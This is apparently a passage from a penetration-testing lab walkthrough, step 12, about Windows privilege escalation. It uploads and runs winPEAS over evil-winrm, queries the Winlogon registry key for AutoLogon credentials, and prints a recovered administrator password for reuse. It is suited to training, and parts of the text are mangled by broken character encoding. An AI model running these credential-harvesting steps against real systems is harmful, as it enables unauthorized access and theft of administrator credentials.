12. Enumerate Local Privileges and AutoLogon
We're now in the post-exploitation phase with access to the system as sysadmin. Our goal is privilege escalation β gaining full control (Administrator or SYSTEM access).
π§ Step-by-Step: Run winPEASx64.exe to Find PrivEsc Vectors:
winPEASx64.exe to Find PrivEsc Vectors:1. π Upload winPEASx64.exe to the target via evil-winrm
From your Kali machine, in the same folder where winPEASx64.exe is saved:
evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'Once inside the shell:
upload winPEASx64.exeIt will upload the file to the current directory (usually C:\Users\sysadmin\).
2. π§ Run winPEASx64.exe inside the shell
After upload completes, run:
.\winPEASx64.exeLet it run fully β it will check:
π Stored credentials (AutoLogon, saved RDP passwords, etc.)
βοΈ Misconfigured services (e.g., unquoted paths)
π¦ Files with weak permissions
πΌ PrivEsc misconfigs (AlwaysInstallElevated, etc.)
3. π Look for These in Output
Pay attention to:
AutoLogon credentialsβ cleartext passwordsAlwaysInstallElevatedβ lets any user install MSI as SYSTEMUnquoted service pathsβ exploitable servicesWritable servicesβ can hijack a serviceCredential filesin registry or config folders
To get AutoLogon Credentials (manually via WinRM)
Once you're inside using evil-winrm:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"Look for these keys in the output:
DefaultUserNameDefaultPasswordβ this is what you want!AutoAdminLogon(should be set to1if enabled)
The AutoLogon password configured for the administrator user is:
d0m@in_c0ntr0ll3rπ Found in this registry value:
DefaultUserName REG_SZ administrator
DefaultPassword REG_SZ d0m@in_c0ntr0ll3rSo the full AutoLogon credentials are:
Username:
administratorPassword:
d0m@in_c0ntr0ll3r
We can now try using these credentials for SMB, WinRM, or any service that accepts domain login.
Last updated